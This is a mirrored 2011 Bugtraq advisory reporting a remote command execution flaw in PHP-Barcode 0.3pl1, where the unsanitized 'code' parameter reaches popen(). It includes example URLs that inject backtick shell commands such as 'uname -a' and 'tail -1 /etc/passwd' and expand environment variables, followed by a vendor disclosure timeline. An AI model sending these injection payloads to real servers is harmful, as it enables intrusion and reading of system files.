PHP-Barcode 0.3pl1 Remote Code Execution

看板Bugtraq作者時間14年前 (2011/07/27 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
PHP-Barcode 0.3pl1 Remote Code Execution =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D The input passed to the code parameter is not sanitized and is used on a popen() function. This allows remote command execution and also allows to see environment vars: Windows http://www.site.com/php-barcode/barcode.php?code=3D%TMP% Linux http://www.site.com/php-barcode/barcode.php?code=3D012$PATH$d http://www.site.com/php-barcode/barcode.php?code=3D`uname%20-a` http://www.site.com/php-barcode/barcode.php?code=3D`tail%20-1%20/etc/passwd= ` Vendor: =A0http://www.ashberg.de/php-barcode/download/ Vendor informed: =A0July =A06 / 2011 Vendor acknowledgement: =A0July 7 / 2011 Fix not available from vendor. - beford
更多 xbefordx. 的文章
文章代碼(AID): #1EBm3YGx (Bugtraq)